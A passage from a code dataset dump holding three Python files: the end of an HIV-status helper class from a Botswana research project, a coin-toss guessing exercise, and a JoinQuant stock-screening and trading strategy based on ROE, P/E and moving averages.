filter\n#minVal = 000\n#maxVal = 2000\n#j=0\n#while(jmaxVal):\n#\t\thistData = histData[:j]+histData[j+1:]\n#\telif (histData[j] POS.\n last_hiv_result_datetime = datetime(self.last_hiv_result_date.year,\n self.last_hiv_result_date.month,\n self.last_hiv_result_date.day)\n# self.last_hiv_result_date.hour,\n# self.last_hiv_result_date.minute,\n# self.last_hiv_result_date.second,\n# self.last_hiv_result_date.millisecond)\n if self.hiv_result == POS:\n # self.hiv_result == POS could be known POS or from Today's Hiv Result\n # of from Elisa's Hiv Result\n if self.last_hiv_result == POS:\n self._hiv_result_datetime = last_hiv_result_datetime\n else:\n # else it could be that of normal hiv_result or elisa hiv_result. 
The two are mutually exclusive.\n self._hiv_result_datetime = (self.todays_hiv_result_datetime or\n self.elisa_hiv_result_datetime)\n else:\n self._hiv_result_datetime = (self.elisa_hiv_result_datetime or\n self.todays_hiv_result_datetime or\n last_hiv_result_datetime) # take latest if not POS\n return self._hiv_result_datetime\n\n @property\n def new_pos(self):\n \"\"\"Returns True if combination of documents and test history show POS.\"\"\"\n if self._new_pos is None:\n previous_pos = None\n previous_pos = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n if previous_pos:\n # This takes care of previous enrollees, those now doing annual survey.\n new_pos = False\n else:\n new_pos = False\n # You have not been tested today, but you have documentation of a posetive\n # past status.\n if (not (self.todays_hiv_result == POS or self.elisa_hiv_result == POS) and\n (self.direct_hiv_pos_documentation or self.indirect_hiv_documentation)):\n pass\n # You only have today's result and possibly an undocumented verbal_hiv_result\n elif ((self.todays_hiv_result == POS or self.elisa_hiv_result == POS) and not\n (self.direct_hiv_pos_documentation or self.indirect_hiv_documentation)):\n new_pos = True\n else:\n # may have no result or just an undocumented verbal_hiv_result,\n # which is not enough information.\n new_pos = None\n self._new_pos = new_pos\n return self._new_pos\n\n @property\n def arv_documentation(self):\n \"\"\"Returns True is there is arv documentation otherwise False or None.\"\"\"\n try:\n arv_documentation = convert_to_nullboolean(self.hiv_care_adherence_instance.arv_evidence)\n except AttributeError:\n arv_documentation = None\n return arv_documentation\n\n @property\n def cd4_result_datetime(self):\n \"\"\"Returns the datetim of the CD4 result run in the household.\"\"\"\n return self.todays_cd4_result_datetime\n\n @property\n def documented_verbal_hiv_result(self):\n \"\"\"Returns an hiv result based on the confirmation of the verbal result by documentation.\"\"\"\n if not self._documented_verbal_hiv_result:\n try:\n # self._documented_verbal_hiv_result = self.hiv_result_documentation_instance.result_recorded\n self._documented_verbal_hiv_result = (POS if (self.indirect_hiv_documentation or\n self.direct_hiv_pos_documentation) else None)\n except AttributeError:\n self._documented_verbal_hiv_result = None\n return self._documented_verbal_hiv_result\n\n @property\n def documented_verbal_hiv_result_date(self):\n \"\"\"Returns an hiv result based on the confirmation of the verbal result by documentation.\"\"\"\n if not self._documented_verbal_hiv_result_date:\n try:\n self._documented_verbal_hiv_result_date = (self.hiv_result_documentation_instance.result_date if\n self.hiv_result_documentation_instance else\n self.hiv_care_adherence_instance.first_arv)\n except AttributeError:\n self._documented_verbal_hiv_result_date = None\n return self._documented_verbal_hiv_result_date\n\n @property\n def cd4_result(self):\n \"\"\"Returns the value of the CD4 run in the household.\"\"\"\n return self.todays_cd4_result\n\n @property\n def defaulter(self):\n \"\"\"Returns true if subject is an ARV defaulter.\"\"\"\n if not self._defaulter:\n try:\n if (self.hiv_care_adherence_instance.on_arv == 'No' and\n self.hiv_care_adherence_instance.arv_evidence == 'Yes'):\n self._defaulter = True\n elif (self.hiv_care_adherence_instance.on_arv == 'No' and\n self.hiv_care_adherence_instance.ever_taken_arv == 'Yes'):\n self._defaulter = True\n else:\n self._defaulter = False\n except 
AttributeError:\n                self._defaulter = None\n        return self._defaulter\n\n    @property\n    def direct_hiv_documentation(self):\n        \"\"\"Returns True if documentation of an HIV test was seen.\"\"\"\n        direct_hiv_documentation = self.previous_value(value_if_pos=True, value_if_not_pos=False)\n        if not direct_hiv_documentation:\n            direct_hiv_documentation = True if self.recorded_hiv_result in [POS, NEG] else False\n        return direct_hiv_documentation\n\n    @property\n    def direct_hiv_pos_documentation(self):\n        \"\"\"Returns True if documentation of a POS HIV test was seen.\"\"\"\n        return True if (self.recorded_hiv_result == POS) else False\n\n    @property\n    def indirect_hiv_documentation(self):\n        \"\"\"Returns True if there is a verbal result and hiv_testing_history.other_record\n        is Yes, otherwise None (not False).\n\n        hiv_testing_history.other_record or hiv_care_adherence.arv_evidence is indirect\n        evidence of a previous \"POS result\" only.\"\"\"\n        try:\n            if self.verbal_hiv_result == POS:\n                if self.hiv_testing_history_instance.other_record == 'Yes' or self.arv_documentation:\n                    self._indirect_hiv_documentation = True\n                else:\n                    self._indirect_hiv_documentation = False\n        except AttributeError:\n            self._indirect_hiv_documentation = None\n        return self._indirect_hiv_documentation\n\n    @property\n    def last_hiv_result(self):\n        \"\"\"Returns the last HIV result, which is either the recorded\n        result or a verbal result supported by direct or indirect documentation.\"\"\"\n        if not self._last_hiv_result:\n            last_hiv_result = None\n            last_hiv_result = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n            # If there is no POS from a previous visit instance result, then check the status of this\n            # visit instance. It could be that after you tested them, they tested POS later elsewhere\n            # and have documentation to prove it.\n            if not last_hiv_result:\n                last_hiv_result = self.recorded_hiv_result or self.documented_verbal_hiv_result\n            self._last_hiv_result = last_hiv_result\n        return self._last_hiv_result\n\n    @property\n    def last_hiv_result_date(self):\n        if not self._last_hiv_result_date:\n            last_hiv_result_date = None\n            last_hiv_result_date = self.previous_value(\n                # attr_if_pos=('hiv_result_datetime', 'date'),\n                attr_if_pos=('hiv_result_datetime',),\n                value_if_not_pos=None)\n            if not last_hiv_result_date:\n                last_hiv_result_date = (self.recorded_hiv_result_date or\n                                        self.documented_verbal_hiv_result_date)\n            self._last_hiv_result_date = last_hiv_result_date\n        return self._last_hiv_result_date\n\n    @property\n    def on_art(self):\n        if self._on_art is None:\n            try:\n                if self.hiv_care_adherence_instance.on_arv == 'Yes':\n                    self._on_art = True\n                elif self.defaulter:\n                    self._on_art = True\n                else:\n                    self._on_art = False\n            except AttributeError:\n                if self.new_pos:\n                    self._on_art = False\n                else:\n                    self._on_art = None\n        return self._on_art\n\n    @property\n    def recorded_hiv_result(self):\n        \"\"\"Returns an hiv result based on the last documented result.\"\"\"\n        if not self._recorded_hiv_result:\n            # a result from a previous survey is considered record of previous POS result\n            recorded_hiv_result = self.previous_value(value_if_pos=POS, value_if_not_pos=None)\n            if not recorded_hiv_result:\n                try:\n                    recorded_hiv_result = self.hiv_test_review_instance.recorded_hiv_result\n                except AttributeError:\n                    recorded_hiv_result = None\n            self._recorded_hiv_result = recorded_hiv_result\n        return self._recorded_hiv_result\n\n    @property\n    def recorded_hiv_result_date(self):\n        \"\"\"Returns the date of the last documented result.\"\"\"\n        if not 
self._recorded_hiv_result_date:\n recorded_hiv_result_date = self.previous_value(\n # attr_if_pos=('hiv_result_datetime', 'date'),\n attr_if_pos=('hiv_result_datetime',),\n value_if_not_pos=None)\n if not recorded_hiv_result_date:\n try:\n recorded_hiv_result_date = self.hiv_test_review_instance.hiv_test_date\n except AttributeError:\n recorded_hiv_result_date = None\n self._recorded_hiv_result_date = recorded_hiv_result_date\n return self._recorded_hiv_result_date\n\n @property\n def todays_cd4_result(self):\n \"\"\"Returns the CD4 result.\"\"\"\n if not self._todays_cd4_result:\n try:\n self._todays_cd4_result = int(self.pima_instance.cd4_value)\n except AttributeError:\n self._todays_cd4_result = None\n return self._todays_cd4_result\n\n @property\n def todays_cd4_result_datetime(self):\n \"\"\"Returns the CD4 result datetime.\"\"\"\n if not self._todays_cd4_result_datetime:\n try:\n self._todays_cd4_result_datetime = self.pima_instance.cd4_datetime\n except AttributeError:\n self._todays_cd4_result_datetime = None\n return self._todays_cd4_result_datetime\n\n @property\n def todays_hiv_result(self):\n \"\"\"Returns an hiv result from today's test, if it exists.\"\"\"\n if not self._todays_hiv_result:\n try:\n self._todays_hiv_result = self.hiv_result_instance.hiv_result\n except AttributeError:\n self._todays_hiv_result = None\n return self._todays_hiv_result\n\n @property\n def todays_hiv_result_datetime(self):\n \"\"\"Returns an hiv result datetime from today's test, if it exists.\"\"\"\n if not self._todays_hiv_result_datetime:\n try:\n self._todays_hiv_result_datetime = self.hiv_result_instance.hiv_result_datetime\n except AttributeError:\n self._todays_hiv_result_datetime = None\n return self._todays_hiv_result_datetime\n\n @property\n def elisa_hiv_result(self):\n \"\"\"Returns an hiv result from the Elisa result form, if it exists.\"\"\"\n if not self._elisa_hiv_result:\n try:\n self._elisa_hiv_result = self.elisa_result_instance.hiv_result\n except AttributeError:\n self._elisa_hiv_result = None\n return self._elisa_hiv_result\n\n @property\n def elisa_hiv_result_datetime(self):\n \"\"\"Returns an hiv result datetime from Elisa result form, if it exists.\"\"\"\n if not self._elisa_hiv_result_datetime:\n try:\n self._elisa_hiv_result_datetime = self.elisa_result_instance.hiv_result_datetime\n except AttributeError:\n self._elisa_hiv_result_datetime = None\n return self._elisa_hiv_result_datetime\n\n @property\n def verbal_hiv_result(self):\n \"\"\"Returns the hiv result given verbally by the respondent from HivTestingHistory.\"\"\"\n if not self._verbal_hiv_result:\n try:\n self._verbal_hiv_result = (self.hiv_testing_history_instance.verbal_hiv_result\n if self.hiv_testing_history_instance.verbal_hiv_result in [\n POS, 'NEG', 'IND'] else None)\n except AttributeError:\n self._verbal_hiv_result = None\n return self._verbal_hiv_result\n\n @property\n def vl_sample_drawn(self):\n \"\"\"Returns True if the VL was drawn.\"\"\"\n if self._vl_sample_drawn is None:\n vl_sample_drawn = self.previous_value(\n attr_if_pos=('vl_sample_drawn', ),\n value_if_not_pos=None)\n if not vl_sample_drawn:\n vl_sample_drawn = True if self.vl_requisition_instance else False\n self._vl_sample_drawn = vl_sample_drawn\n return self._vl_sample_drawn\n\n @property\n def vl_sample_drawn_datetime(self):\n \"\"\"Returns the viral load draw datetime from the SubjectRequisition for VL or None.\"\"\"\n if not self._vl_sample_drawn_datetime:\n vl_sample_drawn_datetime = self.previous_value(\n 
attr_if_pos=('vl_sample_drawn_datetime', ),\n value_if_not_pos=None)\n if not vl_sample_drawn_datetime:\n try:\n vl_sample_drawn_datetime = self.vl_requisition_instance.drawn_datetime\n except AttributeError:\n vl_sample_drawn_datetime = None\n self._vl_sample_drawn_datetime = vl_sample_drawn_datetime\n return self._vl_sample_drawn_datetime\n\n @property\n def hiv_care_adherence_instance(self):\n \"\"\"Returns a model instance of HivCareAdherence or None.\"\"\"\n if not self._hiv_care_adherence_instance:\n try:\n self._hiv_care_adherence_instance = self.models[self.timepoint_key].get(\n 'hiv_care_adherence').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('hiv_care_adherence').DoesNotExist:\n self._hiv_care_adherence_instance = None\n return self._hiv_care_adherence_instance\n\n @property\n def hiv_result_instance(self):\n \"\"\"Returns a model instance of HivResult or None.\"\"\"\n if not self._hiv_result_instance:\n try:\n self._hiv_result_instance = self.models[self.timepoint_key].get(\n 'hiv_result').objects.get(\n subject_visit=self.subject_visit, hiv_result__in=[POS, 'NEG', 'IND', 'Declined'])\n except self.models[self.timepoint_key].get('hiv_result').DoesNotExist:\n self._hiv_result_instance = None\n return self._hiv_result_instance\n\n @property\n def elisa_result_instance(self):\n if not self._elisa_result_instance:\n try:\n self._elisa_result_instance = self.models[self.timepoint_key].get(\n 'elisa_hiv_result').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('elisa_hiv_result').DoesNotExist:\n self._elisa_result_instance = None\n return self._elisa_result_instance\n\n @property\n def hiv_testing_history_instance(self):\n \"\"\"Returns a model instance of HivTestingHistory or None.\"\"\"\n if not self._hiv_testing_history_instance:\n try:\n self._hiv_testing_history_instance = self.models[self.timepoint_key].get(\n 'hiv_testing_history').objects.get(subject_visit=self.subject_visit)\n except self.models[self.timepoint_key].get('hiv_testing_history').DoesNotExist:\n self._hiv_testing_history_instance = None\n return self._hiv_testing_history_instance\n\n @property\n def hiv_result_documentation_instance(self):\n \"\"\"Returns a model instance of HivResultDocumentation or None.\"\"\"\n if not self._hiv_result_documentation_instance:\n try:\n self._hiv_result_documentation_instance = self.models[self.timepoint_key].get(\n 'hiv_result_documentation').objects.get(\n subject_visit=self.subject_visit, result_recorded__in=[POS, 'NEG', 'IND'])\n except self.models[self.timepoint_key].get('hiv_result_documentation').DoesNotExist:\n self._hiv_result_documentation_instance = None\n return self._hiv_result_documentation_instance\n\n @property\n def hiv_test_review_instance(self):\n \"\"\"Returns a model instance of HivTestReview or None.\"\"\"\n if not self._hiv_test_review_instance:\n try:\n self._hiv_test_review_instance = self.models[self.timepoint_key].get(\n 'hiv_test_review').objects.get(\n subject_visit=self.subject_visit, recorded_hiv_result__in=[POS, 'NEG', 'IND'])\n except self.models[self.timepoint_key].get('hiv_test_review').DoesNotExist:\n self._hiv_test_review_instance = None\n return self._hiv_test_review_instance\n\n @property\n def pima_instance(self):\n \"\"\"Returns a model instance of Pima or None.\"\"\"\n if not self._pima_instance:\n try:\n self._pima_instance = self.models[self.timepoint_key].get(\n 'pima').objects.get(subject_visit=self.subject_visit, cd4_value__isnull=False)\n except 
self.models[self.timepoint_key].get('pima').DoesNotExist:\n                self._pima_instance = None\n        return self._pima_instance\n\n    @property\n    def vl_requisition_instance(self):\n        \"\"\"Returns a model instance of the SubjectRequisition for panel VL or None.\"\"\"\n        if not self._vl_requisition_instance:\n            try:\n                self._vl_requisition_instance = self.models[self.timepoint_key].get(\n                    'subject_requisition').objects.get(\n                        subject_visit=self.subject_visit, panel__name='Viral Load', is_drawn='Yes')\n            except self.models[self.timepoint_key].get('subject_requisition').DoesNotExist:\n                pass\n        return self._vl_requisition_instance\n\n    @property\n    def rbd_sample_drawn(self):\n        \"\"\"Returns True if the RBD sample was drawn.\"\"\"\n        if not self._rbd_sample_drawn:\n            rbd_sample_drawn = self.previous_value(\n                attr_if_pos=('rbd_sample_drawn', ),\n                value_if_not_pos=None)\n            if not rbd_sample_drawn:\n                rbd_sample_drawn = True if self.rbd_requisition_instance else False\n            self._rbd_sample_drawn = rbd_sample_drawn\n        return self._rbd_sample_drawn\n\n    @property\n    def rbd_requisition_instance(self):\n        \"\"\"Returns a model instance of the SubjectRequisition for panel RBD or None.\"\"\"\n        if not self._rbd_requisition_instance:\n            try:\n                self._rbd_requisition_instance = self.models[self.timepoint_key].get(\n                    'subject_requisition').objects.get(\n                        subject_visit=self.subject_visit, panel__name='Research Blood Draw', is_drawn='Yes')\n            except self.models[self.timepoint_key].get('subject_requisition').DoesNotExist:\n                pass\n        return self._rbd_requisition_instance\n","repo_name":"botswana-harvard/bcpp-v1","sub_path":"bcpp_subject/subject_status_helper.py","file_name":"subject_status_helper.py","file_ext":"py","file_size_in_byte":29246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
{"seq_id":"37581165925","text":"\"\"\"Debugging Coin Toss\n\nThe following program is meant to be a simple coin toss guessing game. The\nplayer gets two guesses (it’s an easy game). However, the program has several bugs in it. 
Run through the program a few times to find the bugs that\nkeep the program from working correctly.\n\n\"\"\"\n\nimport random, sys\n\n\ndef coin_toss():\n options = ['heads', 'tails']\n while True:\n\n machine_select = options[random.randint(0, 1)]\n user_select = input('[H] to heads, [T] to tails, [E] to exit: ')\n print('*' * 100)\n \n if user_select.upper() == 'H':\n user_select = 'heads'\n elif user_select.upper() == 'T':\n user_select = 'tails'\n elif user_select.upper() == 'E':\n sys.exit()\n else:\n print('Put a valid command')\n continue\n\n if user_select == machine_select:\n print('You win, the coin was ' + user_select)\n break\n else:\n print('You lost, try again :(')\n continue\n\n return\n\n\n\nif __name__ == '__main__':\n\n coin_toss()\n\n\n","repo_name":"ftarantuviez/Automate-Boring-Stuff-with-Python","sub_path":"chapter10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"893931726","text":"from kuanke.wizard import *\nfrom jqdata import *\nimport numpy as np\nimport pandas as pd\nimport talib\nimport datetime\n\n## 初始化函数,设定要操作的股票、基准等等\ndef initialize(context):\n # 设定基准\n set_benchmark('000300.XSHG')\n # 设定滑点\n set_slippage(FixedSlippage(0.02))\n # True为开启动态复权模式,使用真实价格交易\n set_option('use_real_price', True)\n # 设定成交量比例\n set_option('order_volume_ratio', 1)\n # 股票类交易手续费是:买入时佣金万分之三,卖出时佣金万分之三加千分之一印花税, 每笔交易佣金最��扣5块钱\n set_order_cost(OrderCost(open_tax=0, close_tax=0.001, open_commission=0.0003, close_commission=0.0003, min_commission=5), type='stock')\n # 个股最大持仓比重\n g.security_max_proportion = 1\n # 选股频率\n g.check_stocks_refresh_rate = 1\n # 买入频率\n g.buy_refresh_rate = 1\n # 卖出频率\n g.sell_refresh_rate = 1\n # 最大建仓数量\n g.max_hold_stocknum = 4\n\n # 选股频率计数器\n g.check_stocks_days = 0\n # 买卖交易频率计数器\n g.buy_trade_days=0\n g.sell_trade_days=0\n # 获取未卖出的股票\n g.open_sell_securities = []\n # 卖出股票的dict\n g.selled_security_list={}\n\n # 股票筛选初始化函数\n check_stocks_initialize()\n # 股票筛选排序初始化函数\n check_stocks_sort_initialize()\n # 出场初始化函数\n sell_initialize()\n # 入场初始化函数\n buy_initialize()\n # 风控初始化函数\n risk_management_initialize()\n\n # 关闭提示\n log.set_level('order', 'info')\n\n # 运行函数\n run_daily(sell_every_day,'open') #卖出未卖出成功的股票\n run_daily(risk_management, 'every_bar') #风险控制\n run_daily(check_stocks, 'open') #选股\n run_daily(trade, 'open') #交易\n run_daily(selled_security_list_count, 'after_close') #卖出股票日期计数\n\n\n## 股票筛选初始化函数\ndef check_stocks_initialize():\n # 是否过滤停盘\n g.filter_paused = True\n # 是否过滤退市\n g.filter_delisted = True\n # 是否只有ST\n g.only_st = False\n # 是否过滤ST\n g.filter_st = True\n # 股票池\n g.security_universe_index = [\"000300.XSHG\"]\n g.security_universe_user_securities = []\n # 行业列表\n g.industry_list = [\"801010\",\"801020\",\"801030\",\"801040\",\"801050\",\"801080\",\"801110\",\"801120\",\"801130\",\"801140\",\"801150\",\"801160\",\"801170\",\"801180\",\"801200\",\"801210\",\"801230\",\"801710\",\"801720\",\"801730\",\"801740\",\"801750\",\"801760\",\"801770\",\"801780\",\"801790\",\"801880\",\"801890\"]\n # 概念列表\n g.concept_list = []\n\n## 股票筛选排序初始化函数\ndef check_stocks_sort_initialize():\n # 总排序准则: desc-降序、asc-升序\n g.check_out_lists_ascending = 'desc'\n\n## 出场初始化函数\ndef sell_initialize():\n # 设定是否卖出buy_lists中的股票\n g.sell_will_buy = False\n\n # 固定出仓的数量或者百分比\n g.sell_by_amount = None\n g.sell_by_percent = None\n\n## 入场初始化函数\ndef buy_initialize():\n # 是否可重复买入\n g.filter_holded = False\n\n # 委托类型\n g.order_style_str = 'by_market_cap_percent'\n 
g.order_style_value = 100\n\n## 风控初始化函数\ndef risk_management_initialize():\n # 策略风控信号\n g.risk_management_signal = True\n\n # 策略当日触发风控清仓信号\n g.daily_risk_management = True\n\n # 单只最大买入股数或金额\n g.max_buy_value = None\n g.max_buy_amount = None\n\n\n## 卖出未卖出成功的股票\ndef sell_every_day(context):\n g.open_sell_securities = list(set(g.open_sell_securities))\n open_sell_securities = [s for s in context.portfolio.positions.keys() if s in g.open_sell_securities]\n if len(open_sell_securities)>0:\n for stock in open_sell_securities:\n order_target_value(stock, 0)\n g.open_sell_securities = [s for s in g.open_sell_securities if s in context.portfolio.positions.keys()]\n return\n\n## 风控\ndef risk_management(context):\n ### _风控函数筛选-开始 ###\n security_stoploss(context,0.05,g.open_sell_securities)\n portfolio_stoploss(context,0.05,g.open_sell_securities)\n index_stoploss_sicha(context,60,g.open_sell_securities, '000300.XSHG')\n ### _风控函数筛选-结束 ###\n return\n\n## 股票筛选\ndef check_stocks(context):\n if g.check_stocks_days%g.check_stocks_refresh_rate != 0:\n # 计数器加一\n g.check_stocks_days += 1\n return\n # 股票池赋值\n g.check_out_lists = get_security_universe(context, g.security_universe_index, g.security_universe_user_securities)\n # 行业过滤\n g.check_out_lists = industry_filter(context, g.check_out_lists, g.industry_list)\n # 概念过滤\n g.check_out_lists = concept_filter(context, g.check_out_lists, g.concept_list)\n # 过滤ST股票\n g.check_out_lists = st_filter(context, g.check_out_lists)\n # 过滤退市股票\n g.check_out_lists = delisted_filter(context, g.check_out_lists)\n # 财务筛选\n g.check_out_lists = financial_statements_filter(context, g.check_out_lists)\n # 行情筛选\n g.check_out_lists = situation_filter(context, g.check_out_lists)\n # 技术指标筛选\n g.check_out_lists = technical_indicators_filter(context, g.check_out_lists)\n # 形态指标筛选函数\n g.check_out_lists = pattern_recognition_filter(context, g.check_out_lists)\n # 其他筛选函数\n g.check_out_lists = other_func_filter(context, g.check_out_lists)\n\n # 排序\n input_dict = get_check_stocks_sort_input_dict()\n g.check_out_lists = check_stocks_sort(context,g.check_out_lists,input_dict,g.check_out_lists_ascending)\n\n # 计数器归一\n g.check_stocks_days = 1\n return\n\n## 交易函数\ndef trade(context):\n # 初始化买入列表\n buy_lists = []\n\n # 买入股票筛选\n if g.buy_trade_days%g.buy_refresh_rate == 0:\n # 获取 buy_lists 列表\n buy_lists = g.check_out_lists\n # 过滤ST股票\n buy_lists = st_filter(context, buy_lists)\n # 过滤停牌股票\n buy_lists = paused_filter(context, buy_lists)\n # 过滤退市股票\n buy_lists = delisted_filter(context, buy_lists)\n # 过滤涨停股票\n buy_lists = high_limit_filter(context, buy_lists)\n\n ### _入场函数筛选-开始 ###\n ### _入场函数筛选-结束 ###\n\n # 卖出操作\n if g.sell_trade_days%g.sell_refresh_rate != 0:\n # 计数器加一\n g.sell_trade_days += 1\n else:\n # 卖出股票\n sell(context, buy_lists)\n # 计数器归一\n g.sell_trade_days = 1\n\n\n # 买入操作\n if g.buy_trade_days%g.buy_refresh_rate != 0:\n # 计数器加一\n g.buy_trade_days += 1\n else:\n # 卖出股票\n buy(context, buy_lists)\n # 计数器归一\n g.buy_trade_days = 1\n\n## 卖出股票日期计数\ndef selled_security_list_count(context):\n g.daily_risk_management = True\n if len(g.selled_security_list)>0:\n for stock in g.selled_security_list.keys():\n g.selled_security_list[stock] += 1\n\n################################## 选股函数群 ##################################\n\n## 财务指标筛选函数\ndef financial_statements_filter(context, security_list):\n ### _财务指标筛选函数-开始 ###\n security_list = financial_data_filter_dayu(security_list, indicator.gross_profit_margin, 40)\n security_list = financial_data_filter_qujian(security_list, valuation.pe_ratio, (5,35))\n 
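# Fundamental screen so far: gross_profit_margin above 40 and pe_ratio inside (5, 35)\n    # (dayu/qujian appear to be the wizard's greater-than/interval helpers); the next\n    # filter additionally requires roe above 10 before the market and technical filters run.\n    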
security_list = financial_data_filter_dayu(security_list, indicator.roe, 10)\n ### _财务指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 行情筛选函数\ndef situation_filter(context, security_list):\n ### _行情筛选函数-开始 ###\n security_list = [security for security in security_list if situation_filter_dayu_ma(security, 'close', 60)]\n ### _行情筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 技术指标筛选函数\ndef technical_indicators_filter(context, security_list):\n ### _技术指标筛选函数-开始 ###\n security_list = [security for security in security_list if EMA_judge_duotou(security,10,60)]\n ### _技术指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 形态指标筛选函数\ndef pattern_recognition_filter(context, security_list):\n ### _形态指标筛选函数-开始 ###\n ### _形态指标筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n## 其他方式筛选函数\ndef other_func_filter(context, security_list):\n ### _其他方式筛选函数-开始 ###\n ### _其他方式筛选函数-结束 ###\n\n # 返回列表\n return security_list\n\n# 获取选股排序的 input_dict\ndef get_check_stocks_sort_input_dict():\n input_dict = {\n indicator.roe:('desc',1),\n valuation.pe_ratio:('asc',1),\n }\n # 返回结果\n return input_dict\n\n################################## 交易函数群 ##################################\n# 交易函数 - 出场\ndef sell(context, buy_lists):\n # 获取 sell_lists 列表\n init_sl = context.portfolio.positions.keys()\n sell_lists = context.portfolio.positions.keys()\n\n # 判断是否卖出buy_lists中的股票\n if not g.sell_will_buy:\n sell_lists = [security for security in sell_lists if security not in buy_lists]\n\n ### _出场函数筛选-开始 ###\n ### _出场函数筛选-结束 ###\n\n # 卖出股票\n if len(sell_lists)>0:\n for stock in sell_lists:\n sell_by_amount_or_percent_or_none(context,stock, g.sell_by_amount, g.sell_by_percent, g.open_sell_securities)\n\n # 获取卖出的股票, 并加入到 g.selled_security_list中\n selled_security_list_dict(context,init_sl)\n\n return\n\n# 交易函数 - 入场\ndef buy(context, buy_lists):\n # 风控信号判断\n if not g.risk_management_signal:\n return\n\n # 判断当日是否触发风控清仓止损\n if not g.daily_risk_management:\n return\n # 判断是否可重复买入\n buy_lists = holded_filter(context,buy_lists)\n\n # 获取最终的 buy_lists 列表\n Num = g.max_hold_stocknum - len(context.portfolio.positions)\n buy_lists = buy_lists[:Num]\n\n # 买入股票\n if len(buy_lists)>0:\n # 分配资金\n result = order_style(context,buy_lists,g.max_hold_stocknum, g.order_style_str, g.order_style_value)\n for stock in buy_lists:\n if len(context.portfolio.positions) < g.max_hold_stocknum:\n # 获取资金\n Cash = result[stock]\n # 判断个股最大持仓比重\n value = judge_security_max_proportion(context,stock,Cash,g.security_max_proportion)\n # 判断单只最大买入股数或金额\n amount = max_buy_value_or_amount(stock,value,g.max_buy_value,g.max_buy_amount)\n # 下单\n order(stock, amount, MarketOrderStyle())\n return\n\n################################### 公用函数群 ##################################\n## 排序\ndef check_stocks_sort(context,security_list,input_dict,ascending='desc'):\n if (len(security_list) == 0) or (len(input_dict) == 0):\n return security_list\n else:\n # 生成 key 的 list\n idk = list(input_dict.keys())\n # 生成矩阵\n a = pd.DataFrame()\n for i in idk:\n b = get_sort_dataframe(security_list, i, input_dict[i])\n a = pd.concat([a,b],axis = 1)\n # 生成 score 列\n a['score'] = a.sum(1,False)\n # 根据 score 排序\n if ascending == 'asc':# 升序\n if hasattr(a, 'sort'):\n a = a.sort(['score'],ascending = True)\n else:\n a = a.sort_values(['score'],ascending = True)\n elif ascending == 'desc':# 降序\n if hasattr(a, 'sort'):\n a = a.sort(['score'],ascending = False)\n else:\n a = a.sort_values(['score'],ascending = False)\n # 返回结果\n return list(a.index)\n\n## 过滤同一标的继上次卖出N天不再买入\ndef 
filter_n_tradeday_not_buy(security, n=0):\n    try:\n        if (security in g.selled_security_list.keys()) and (g.selled_security_list[security] < n):\n            return False\n        return True\n    except:\n        return True\n\n## 获取卖出的股票, 并加入到 g.selled_security_list中\ndef selled_security_list_dict(context, security_list):\n    selled_sl = [s for s in security_list if s not in context.portfolio.positions.keys()]\n    if len(selled_sl) > 0:\n        for stock in selled_sl:\n            g.selled_security_list[stock] = 0\n\n## 过滤停牌股票\ndef paused_filter(context, security_list):\n    if g.filter_paused:\n        current_data = get_current_data()\n        security_list = [stock for stock in security_list if not current_data[stock].paused]\n    # 返回结果\n    return security_list\n\n## 过滤退市股票\ndef delisted_filter(context, security_list):\n    if g.filter_delisted:\n        current_data = get_current_data()\n        security_list = [stock for stock in security_list if not (('退' in current_data[stock].name) or ('*' in current_data[stock].name))]\n    # 返回结果\n    return security_list\n\n\n## 过滤ST股票\ndef st_filter(context, security_list):\n    if g.only_st:\n        current_data = get_current_data()\n        security_list = [stock for stock in security_list if current_data[stock].is_st]\n    else:\n        if g.filter_st:\n            current_data = get_current_data()\n            security_list = [stock for stock in security_list if not current_data[stock].is_st]\n    # 返回结果\n    return security_list\n\n# 过滤涨停股票\ndef high_limit_filter(context, security_list):\n    current_data = get_current_data()\n    security_list = [stock for stock in security_list if not (current_data[stock].day_open >= current_data[stock].high_limit)]\n    # 返回结果\n    return security_list\n\n# 获取股票股票池\ndef get_security_universe(context, security_universe_index, security_universe_user_securities):\n    temp_index = []\n    for s in security_universe_index:\n        if s == 'all_a_securities':\n            temp_index += list(get_all_securities(['stock'], context.current_dt.date()).index)\n        else:\n            temp_index += get_index_stocks(s)\n    for x in security_universe_user_securities:\n        temp_index += x\n    return sorted(list(set(temp_index)))\n\n# 行业过滤\ndef industry_filter(context, security_list, industry_list):\n    if len(industry_list) == 0:\n        # 返回股票列表\n        return security_list\n    else:\n        securities = []\n        for s in industry_list:\n            temp_securities = get_industry_stocks(s)\n            securities += temp_securities\n        security_list = [stock for stock in security_list if stock in securities]\n        # 返回股票列表\n        return security_list\n\n# 概念过滤\ndef concept_filter(context, security_list, concept_list):\n    if len(concept_list) == 0:\n        return security_list\n    else:\n        securities = []\n        for s in concept_list:\n            temp_securities = get_concept_stocks(s)\n            securities += temp_securities\n        security_list = [stock for stock in security_list if stock in securities]\n        # 返回股票列表\n        return security_list\n\n#自定义函数","repo_name":"linbirg/qt","sub_path":"high_roe.py","file_name":"high_roe.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"}
